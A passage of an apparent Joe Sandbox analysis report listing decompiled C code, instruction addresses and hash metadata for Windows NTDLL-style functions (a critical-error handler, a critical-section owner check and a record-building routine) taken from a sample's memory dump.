				 *((intOrPtr*)(_t41 - 0x64)) = L0180DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0180DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0180D130(_t34, _t39, _t40);
			}





                                                    0x01868df1
                                                    0x01868df1
                                                    0x01868df1
                                                    0x01868df1
                                                    0x01868df1
                                                    0x01868df1
                                                    0x01868df3
                                                    0x01868df8
                                                    0x01868dfd
                                                    0x01868e00
                                                    0x01868e0e
                                                    0x01868e2a
                                                    0x01868e36
                                                    0x01868e38
                                                    0x01868e3c
                                                    0x01868e46
                                                    0x01868e46
                                                    0x01868e36
                                                    0x01868e50
                                                    0x01868e56
                                                    0x01868e59
                                                    0x01868e5c
                                                    0x01868e60
                                                    0x01868e67
                                                    0x01868e6d
                                                    0x01868e73
                                                    0x01868e74
                                                    0x01868eb1
                                                    0x01868ebd

                                                    Strings
                                                    • Critical error detected %lx, xrefs: 01868E21
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Critical error detected %lx
                                                    • API String ID: 0-802127002
                                                    • Opcode ID: ee25b9eeb8545ab39fcebd5f0d3c201982b83f65349beacd16598cbfceb9ad01
                                                    • Instruction ID: 19702784297af732aedd603f05a89a57fcdef0c4faa78e5fae277321d42b5ffb
                                                    • Opcode Fuzzy Hash: ee25b9eeb8545ab39fcebd5f0d3c201982b83f65349beacd16598cbfceb9ad01
                                                    • Instruction Fuzzy Hash: 3E1135B5D15348DBDF25CFE8890679CBBB4AB15314F24426EE569AB282C7344B02CF15
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0184FF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0184FF60
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                    • API String ID: 0-1911121157
                                                    • Opcode ID: 4b6162e8d35eaab5f4011db87fce06a16fc90e65ca325814c580dad745e2432d
                                                    • Instruction ID: 048d73d0b37550b1b9ab8c81af6ff105f69a2417ee43d64f392f4bce411a911d
                                                    • Opcode Fuzzy Hash: 4b6162e8d35eaab5f4011db87fce06a16fc90e65ca325814c580dad745e2432d
                                                    • Instruction Fuzzy Hash: 1711E171910548EFEB22DB98CC49F98BBB1FB18704F548058E208E72A1CF399B40CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01885BA5 Relevance: .6, Instructions: 592COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 88%
                                                    			E01885BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1891178);
				E0180D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E01884C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E017FD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E01885542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x18a60e8;
								if( *0x18a60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x18a60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E017F9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E017F6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E017FF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E017FF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E017FF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E017FFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E017FFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E017FF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E017FF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E01884CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0180D130(_t427, _t494, _t511);
				}
			}










































































                                                    0x01885ba5
                                                    0x01885baa
                                                    0x01885baf
                                                    0x01885bb4
                                                    0x01885bb6
                                                    0x01885bbc
                                                    0x01885bbe
                                                    0x01885bc4
                                                    0x01885bcd
                                                    0x01885bd3
                                                    0x01885bd6
                                                    0x01885bdc
                                                    0x01885be0
                                                    0x01885be3
                                                    0x01885beb
                                                    0x01885bf2
                                                    0x01885bf8
                                                    0x01885bfe
                                                    0x01885c04
                                                    0x01885c0e
                                                    0x01885c18
                                                    0x01885c1f
                                                    0x01885c25
                                                    0x01885c2a
                                                    0x01885c2c
                                                    0x01885c32
                                                    0x01885c3a
                                                    0x01885c3f
                                                    0x01885c42
                                                    0x01885c48
                                                    0x01885c5b
                                                    0x01885c5b
                                                    0x01885c2c
                                                    0x01885cb7
                                                    0x01885cb9
                                                    0x01885cbf
                                                    0x01885cc2
                                                    0x01885cca
                                                    0x01885ccb
                                                    0x01885ccb
                                                    0x01885cd1
                                                    0x01885cd7
                                                    0x01885cda
                                                    0x01885ce1
                                                    0x01885ce4
                                                    0x01885ce7
                                                    0x01885ced
                                                    0x01885cf3
                                                    0x01885cf9
                                                    0x01885cff
                                                    0x01885d08
                                                    0x01885d0a
                                                    0x01885d0e
                                                    0x01885d10
                                                    0x00000000
                                                    0x00000000
                                                    0x01885d16
                                                    0x01885d1a
                                                    0x00000000
                                                    0x00000000
                                                    0x01885d20
                                                    0x01885d22
                                                    0x01885d25
                                                    0x01885d2f
                                                    0x01885d2f
                                                    0x01885d33
                                                    0x01885d3d
                                                    0x01885d49
                                                    0x01885d4b
                                                    0x00000000
                                                    0x00000000
                                                    0x01885d5a
                                                    0x01885d5d
                                                    0x01885d60
                                                    0x00000000
                                                    0x00000000
                                                    0x01885d66
                                                    0x01885d69
                                                    0x00000000
                                                    0x00000000
                                                    0x01885d6f
                                                    0x01885d6f
                                                    0x01885d73
                                                    0x01885d79
                                                    0x01885d7f
                                                    0x01885d86
                                                    0x01885d95
                                                    0x01885d98
                                                    0x01885dba
                                                    0x01885dcb
                                                    0x01885dce
                                                    0x01885dd3
                                                    0x01885dd6
                                                    0x01885dd8
                                                    0x01885de6
                                                    0x01885dec
                                                    0x01885dee
                                                    0x01885df1
                                                    0x01885df3
                                                    0x0188635a
                                                    0x0188635a
                                                    0x00000000
                                                    0x0188635a
                                                    0x01885dfe
                                                    0x01885e02
                                                    0x01885e05
                                                    0x01885e07
                                                    0x01885e10
                                                    0x01885e13
                                                    0x01885e1b
                                                    0x01885e1c
                                                    0x01885e21
                                                    0x01885e22
                                                    0x01885e23
                                                    0x01885e25
                                                    0x01885e2a
                                                    0x01885e2c
                                                    0x01885e2e
                                                    0x01885e36
                                                    0x01885e39
                                                    0x01885e42
                                                    0x01885e47
                                                    0x01885e4d
                                                    0x01885e54
                                                    0x01885e54
                                                    0x01885e54
                                                    0x01885e2e
                                                    0x01885e5c
                                                    0x01885e5f
                                                    0x01885e62
                                                    0x01885e64
                                                    0x01885e6b
                                                    0x01885e70
                                                    0x01885e7a
                                                    0x01885e7a
                                                    0x01885e7a
                                                    0x01885e6b
                                                    0x01885e7e
                                                    0x01885e7f
                                                    0x01885e7f
                                                    0x01885e81
                                                    0x01885e87
                                                    0x01885e8b
                                                    0x01885e8c
                                                    0x01885e8c
                                                    0x01885e8c
                                                    0x01885e9a
                                                    0x01885e9c
                                                    0x01885ea2
                                                    0x01885ea6
                                                    0x01885f50
                                                    0x01885f50
                                                    0x01885f57
                                                    0x01885f66
                                                    0x01885f66
                                                    0x01885f66
                                                    0x01885f68
                                                    0x01885f6a
                                                    0x018863d0
                                                    0x00000000
                                                    0x01885f70
                                                    0x01885f70
                                                    0x01885f91
                                                    0x01885f9c
                                                    0x01885f9e
                                                    0x01885fa4
                                                    0x01885fa6
                                                    0x0188638c
                                                    0x01886392
                                                    0x018863a1
                                                    0x018863a7
                                                    0x018863af
                                                    0x018863af
                                                    0x018863bd
                                                    0x018863d8
                                                    0x00000000
                                                    0x018863d8
                                                    0x01885fac
                                                    0x01885fb2
                                                    0x01885fb4
                                                    0x01885fbd
                                                    0x01885fc6
                                                    0x01885fce
                                                    0x01885fd4
                                                    0x01885fdc
                                                    0x01885fec
                                                    0x01885fed
                                                    0x01885fee
                                                    0x01885fef
                                                    0x01885ff9
                                                    0x01885ffa
                                                    0x01885ffb
                                                    0x01885ffc
                                                    0x01886000
                                                    0x01886004
                                                    0x01886012
                                                    0x01886012
                                                    0x01886018
                                                    0x01886019
                                                    0x0188601a
                                                    0x0188601b
                                                    0x0188601c
                                                    0x01886020
                                                    0x01886059
                                                    0x0188605c
                                                    0x01886061
                                                    0x01886061
                                                    0x01886022
                                                    0x01886022
                                                    0x01886022
                                                    0x01886025
                                                    0x0188602a
                                                    0x0188602b
                                                    0x01886031
                                                    0x01886037
                                                    0x01886038
                                                    0x0188603e
                                                    0x01886048
                                                    0x01886049
                                                    0x0188604a
                                                    0x0188604b
                                                    0x0188604c
                                                    0x0188604d
                                                    0x01886053
                                                    0x01886054
                                                    0x01886054
                                                    0x01886062
                                                    0x01886065
                                                    0x01886067
                                                    0x0188606a
                                                    0x01886070
                                                    0x01886075
                                                    0x01886076
                                                    0x01886081
                                                    0x01886087
                                                    0x01886095
                                                    0x01886099
                                                    0x0188609e
                                                    0x018860a4
                                                    0x018860ae
                                                    0x018860b0
                                                    0x018860b3
                                                    0x018860b6
                                                    0x018860b8
                                                    0x018860ba
                                                    0x018860ba
                                                    0x018860ba
                                                    0x018860ba
                                                    0x018860be
                                                    0x018860c0
                                                    0x018860c5
                                                    0x018860c5
                                                    0x018860c5
                                                    0x018860c6
                                                    0x018860cd
                                                    0x01886114
                                                    0x018860cf
                                                    0x018860cf
                                                    0x018860d4
                                                    0x018860d5
                                                    0x018860da
                                                    0x018860db
                                                    0x018860e1
                                                    0x018860e2
                                                    0x018860e8
                                                    0x018860f8
                                                    0x018860fd
                                                    0x018860fe
                                                    0x01886102
                                                    0x01886104
                                                    0x01886107
                                                    0x01886109
                                                    0x0188610b
                                                    0x0188610b
                                                    0x0188610b
                                                    0x0188610b
                                                    0x0188610f
                                                    0x0188610f
                                                    0x01886117
                                                    0x0188611a
                                                    0x0188611f
                                                    0x01886125
                                                    0x01886134
                                                    0x01886139
                                                    0x0188613f
                                                    0x01886146
                                                    0x01886148
                                                    0x0188614b
                                                    0x0188614d
                                                    0x0188614f
                                                    0x0188614f
                                                    0x0188614f
                                                    0x0188614f
                                                    0x01886153
                                                    0x01886159
                                                    0x01886159
                                                    0x0188615c
                                                    0x01886163
                                                    0x01886169
                                                    0x0188616c
                                                    0x01886172
                                                    0x01886181
                                                    0x01886186
                                                    0x01886187
                                                    0x0188618b
                                                    0x01886191
                                                    0x01886195
                                                    0x018861a3
                                                    0x018861bb
                                                    0x018861c0
                                                    0x018861c3
                                                    0x018861cc
